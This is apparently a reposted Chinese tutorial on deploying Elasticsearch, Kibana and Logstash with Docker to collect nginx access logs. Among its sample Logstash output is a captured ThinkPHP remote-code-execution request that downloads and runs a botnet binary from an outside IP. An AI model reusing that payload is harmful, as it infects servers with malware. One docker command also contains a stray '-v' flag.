2. 程式人生 > 其它 >docker 快速部署elk

docker 快速部署elk

阿新 發佈:2021-10-23

docker部署ELK

環境 centos7

1 配置阿里雲加速器

  • 登入阿里雲控制檯
  • 進入容器服務
  • 進入映象加速器,按照說明操作

2 pull image

  • 獲取ES映象:docker pull elasticsearch:latest
  • 獲取kibana映象:docker pull kibana:latest
  • 獲取logstash映象:docker pull logstash:latest

3 啟動Elasticsearch

  • 官方映象裡面ES的配置檔案儲存在/usr/share/elasticsearch/config

  • 資料檔案目錄/usr/share/elasticsearch/data

    如果需要可以在啟動容器的時候的時候使用 -v引數掛載到宿主機

    示例不進行掛載

    docker run --name elasticsearch -v -p 9200:9200 -d elasticsearch

  • 啟動後在瀏覽器訪問ip:9200,返回如下則證明啟動正常

    {
  "name" : "VDw5UKv",
  "cluster_name" : "elasticsearch",
  "cluster_uuid" : "DNTJCXjpSNOrS6rBSJtYXw",
  "version" : {
    "number" : "5.6.12",
    "build_hash" : "cfe3d9f",
    "build_date" : "2018-09-10T20:12:43.732Z",
    "build_snapshot" : false,
    "lucene_version" : "6.6.1"
  },
  "tagline" : "You Know, for Search"
}

    備註:es預設jvm使用記憶體是2G,若機器記憶體不足,可以修改配置檔案

    find /var/lib/docker/ -name jvm.options
/var/lib/docker/overlay2/d32d0371ed2cb37d660bd8acf0f2407735c4a1c1a09f017e053068b29ddd40d4/diff/etc/elasticsearch/jvm.options

vim /var/lib/docker/overlay2/d32d0371ed2cb37d660bd8acf0f2407735c4a1c1a09f017e053068b29ddd40d4/diff/etc/elasticsearch/jvm.options
修改
-Xms2g
-Xmx2g
為
-Xms1g
-Xmx1g

3 啟動kibana

Kibana作為ES操作的UI,需要跟ES容器通訊,所以這裡要將ES的容器link一下,對外提供5601埠做頁面互動。

docker run --name kibana --link elasticsearch:elasticsearch -p 5601:5601 -d kibana

器啟動後用瀏覽器訪問5601埠,可以看到kibana頁面.

但是現在es中沒有索引,所以沒有資料

4 啟動logstash

Logstash主要作用是收集日誌,這個元件有很多外掛,可以支援大部分日誌整合方式,如tcp、udp、jdbc、檔案、佇列等,他的配置非常簡單,啟動方式也很簡單,這裡以nginx的訪問日誌為例,我們配置logstash讀取nginx的access.log,然後把日誌轉發到Elasticsearch。

啟動logstash前需要配置logstash,採集日誌、輸出元件ip等資訊

參考其他部落格教程,配置檔案在容器路徑為/usr/share/logstash/config,但是經自測發現並無此config,所以從https://artifacts.elastic.co/downloads/logstash/logstash-7.0.0.tar.gz下載logstash安裝包,並解壓後獲得config目錄下所有檔案

  • 複製config資料夾到/root/logstash/config

  • 建立採集日誌的config

    假設採集nginx的日誌檔案

    nginx的日誌檔案預設在/var/log/nginx/access.log

    建立/root/logstash/config/nginx.conf

    ## nginx.conf
input {
  file {  # 指定一個檔案作為輸入源
    path => "/var/log/nginx/access.log"  # 指定檔案的路徑
    start_position => "beginning"               # 指定何時開始收集
    type => "nginx"                                             # 定義日誌型別,可自定義
  }
}
filter {  # 配置過濾器
    grok {
        match => { "message" => "%{IPORHOST:http_host} %{IPORHOST:clientip} - %{USERNAME:remote_user} \[%{HTTPDATE:timestamp}\] \"(?:%{WORD:http_verb} %{NOTSPACE:http_request}(?: HTTP/%{NUMBER:http_version})?|%{DATA:raw_http_request})\" %{NUMBER:response} (?:%{NUMBER:bytes_read}|-) %{QS:referrer} %{QS:agent} %{QS:xforwardedfor} %{NUMBER:request_time:float}"}  # 定義日誌的輸出格式
    }
    geoip {
        source => "clientip"
    }
}
output {
    stdout { codec => rubydebug }
    elasticsearch {
        hosts => ["ip:9200"]
        index => "logstash-nginx-%{+YYYY.MM.dd}" 指定索引,在kibana中需要根據此索引進行查詢
  }
}

  • 啟動logstash

    因為採集的日誌是/var/log/nginx/access.log,所以需要將此路徑對映到容器

    配置檔案的路徑也要對映到容器, /root/logstash/config/ --> /usr/share/logstash/config/

    docker run -itd --name=logstash -v /var/log/nginx/access.log:/var/log/nginx/access.log -v /root/logstash/config/:/usr/share/logstash/config docker.io/logstash -f /usr/share/logstash/config/nginx.conf

    -f 指定配置檔案

    若是要採集多個檔案,可以建立多個.conf,將所有conf放到同一目錄,-f 指定這個目錄即可

    啟動後,呼叫幾次nginx,會有如下日誌輸出,證明採集成功

    {
          "path" => "/var/log/nginx/access.log",
    "@timestamp" => 2021-10-23T08:18:26.907Z,
      "@version" => "1",
          "host" => "a1488190ee70",
       "message" => "89.248.164.165 - - [23/Oct/2021:16:18:26 +0800] \"GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1\" 404 3650 \"-\" \"Mozilla\" \"-\"",
          "type" => "nginx",
          "tags" => [
        [0] "_grokparsefailure",
        [1] "_geoip_lookup_failure"
    ]
}
{
          "path" => "/var/log/nginx/access.log",
    "@timestamp" => 2021-10-23T08:27:34.089Z,
      "@version" => "1",
          "host" => "a1488190ee70",
       "message" => "177.149.164.24 - - [23/Oct/2021:16:27:33 +0800] \"GET /index.php?s=/index/\\x09hink\\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://45.14.226.120/notabotnet/notabotnet.x86 -O /tmp/.notabotnet; chmod 777 /tmp/.notabotnet; /tmp/.notabotnet ThinkphpRep' HTTP/1.1\" 400 157 \"-\" \"Tsunami/2.0\" \"-\"",
          "type" => "nginx",
          "tags" => [
        [0] "_grokparsefailure",
        [1] "_geoip_lookup_failure"
    ]
}

5 驗證

登入kibana,點選management

  • 建立索引,填寫的索引是會在後臺校驗的,若無此索引則不能建立,在logstash中nginx.conf中配置的index即等同於這個索引。

    示例中配置index是logstash-nginx-%{+YYYY.MM.dd},此處建立索引logstash-*即可匹配所有logstash-開頭的索引。

  • 建立索引成功後,點選discover即可檢視到日誌

相關推薦

使用docker快速部署ELK

使用docker快速部署elk 1.軟體&工具介紹ELK是三個開源軟體的縮寫,分別表示: Elasticsearch, Logstash, Kibana,它們都是開源軟體。新增了一個FileBeat,它是一個輕量級的日誌收集處理I具(Agent), Filebeat佔用資源

docker 快速部署elk

docker部署ELK 環境 centos7 1 配置阿里雲加速器 登入阿里雲控制檯 進入容器服務 進入映象加速器,按照說明操作

使用Docker 快速部署 ElasticSearch

1 拉取映象 docker pull elasticsearch:6.8.0 複製程式碼 2 執行容器 docker run -d --name es_680 --net dnw_es_680 -p 9200:9200 -p 9300:9300 -e \"discovery.type=single-node\" elasticsearch:6.8.0

通過docker快速部署mysql5.7

step1:拉取mysql5.7映象 docker pull mysql:5.7 step2:建立資料目錄和初始化sql 說明: 1、資料目錄使用者mysql的本地持久化,便於服務重啟資料不丟失 2、初始化sql使用者容器啟動後執行的初始化sql,從而完成

使用docker快速部署mysql pxc叢集

文章目錄 環境準備 節點名稱ip地址node1192.168.130.20node2192.168.130.19node2192.168.130.21

使用 Docker 快速部署 Golang 應用

文章目錄: 目標映象 GolangAlpine 埠對映 佔用本地埠 8081 備註 Dockerfile 文章使用到的軟體:

Rancher 單節點 Docker 快速部署

版本:v2.5 參考:https://docs.rancher.cn/docs/rancher2.5/quick-start-guide/_index 一、手動快速部署

使用docker快速部署一個consul叢集

  作為一個開發者,有時候需要一個叢集環境,之前的做法要麼就是使用多個虛擬機器,要麼就是採用不同的埠來模擬,但是虛擬機器比較佔記憶體,而且啟動慢,採用不同的埠來模擬,管理起來比較麻煩一些,程式隔離性差

Docker 快速部署rap2

https://github.com/wzqnls/rap2-delos 安裝 Docker 國內使用者可參考https://get.daocloud.io/安裝 Docker 以及 Docker Compose (Linux 使用者需要單獨安裝),建議按照連結指引配置 Docker Hub 的國內映象提高載入

Docker安裝部署ELK教程 (Elasticsearch+Kibana+Logstash+Filebeat)

ELK是由 Elasticsearch、Logstash和Kibana 三部分元件組成。 Elasticsearch 是個開源分散式搜尋引擎,它的特點有:分散式,零配置,自動發現,索引自動分片,索引副本機制,restful風格介面,多資料來源,自動搜尋負

使用docker快速部署專案環境

使用docker一鍵部署專案環境 1.安裝docker 2.安裝docker-compose 3.拉取映象啟動容器 上傳easy_install.zip壓縮包將內容解壓到要安裝的目錄如/home下,解壓包中為編寫好的docker-compose.yml檔案,其中包含了多個容

Springboot專案搭建01-Docker快速部署專案

一、專案簡介 1.wumei-smart是一套開源的軟硬體系統,可用於二次開發和學習,快速搭建自己的智慧家居系統。硬體工程師可以把自己的裝置整合到系統;軟體工程師可以使用專案中的裝置熟悉軟硬體互動。

rabbitmq - docker快速部署

docker快速部署rabbitmq 編寫docker-compose.yml version: \'3\' services: rabbitmq: image: rabbitmq:3.8.3-management

教程一:阿里雲使用docker快速部署服務端

《物美智慧》系列文章目錄 前言 本文章承接上文,上篇文章已介紹物美智慧平臺的功能和技術棧,本篇來教各位快速搭建此物聯網平臺的服務端注:官方程式碼文件與平臺可檢視下面gitee連結https://gitee.com/kerwincui/w

IntelliJ IDEA快速實現Docker映象部署

IntelliJ IDEA快速實現Docker映象部署 一、Docker開啟遠端訪問 [root@izwz9eftauv7x69f5jvi96z docker]# vim /usr/lib/systemd/system/docker.service

基於Docker Compose 的Java Web環境釋出,Springboot專案快速部署

技術標籤:docker composeNginxspringboot 一鍵部署基於SSL的web專案,實現https訪問。 文件目錄,文末附相關dockerfile配置

快速部署docker環境(照做就行)

Docker是一個容器技術。具有很強的可移植性。從本質上來說,他是一個虛擬機器。以映象為基礎單位,可以將單個專案分批的做好打成包。然後具有很強的可移植性。彼此之間不影響。下次要是誰需要,就可以直接拿出來用了

使用Docker快速搭建輕量級自動化部署平臺

一、安裝Docker 1.1 安裝excpet $ apt-get -f install expect 1.2 編寫執行Docker安裝指令碼 編寫docker_dep.exp指令碼

簡單使用 持續整合jenkins 快速部署springboot和vue專案(面向開發者)

1-前言 作為個人開發者,往往想把springboot專案部署到伺服器總要經過一些很麻煩的步驟,比如springboot專案要在本地編譯打包成jar包,然後上傳jar包檔案到伺服器,再然後使用一些命令去啟動這個jar包,這樣你每修改一

在 Kubernetes 叢集快速部署 KubeSphere 容器平臺

KubeSphere 不僅支援部署在 Linux 之上,還支援在已有 Kubernetes 叢集之上部署 KubeSphere,自動納管 Kubernetes 叢集的已有資源與容器。